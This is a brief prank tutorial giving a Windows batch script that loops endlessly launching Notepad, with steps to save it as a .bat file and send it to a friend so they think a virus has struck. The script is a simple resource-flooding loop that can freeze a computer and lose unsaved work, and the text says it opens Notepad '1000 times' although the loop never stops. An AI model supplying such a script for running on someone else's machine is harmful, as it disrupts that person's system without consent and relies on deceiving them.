Open note pad and type the following to make notepad open 1000 times continoulsy
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
Save as the file as"filename".bat File
Open that file and notepad will flood your PC.
Send that file to your friend and scare them, Make them think that a virus attacked his/her's system.
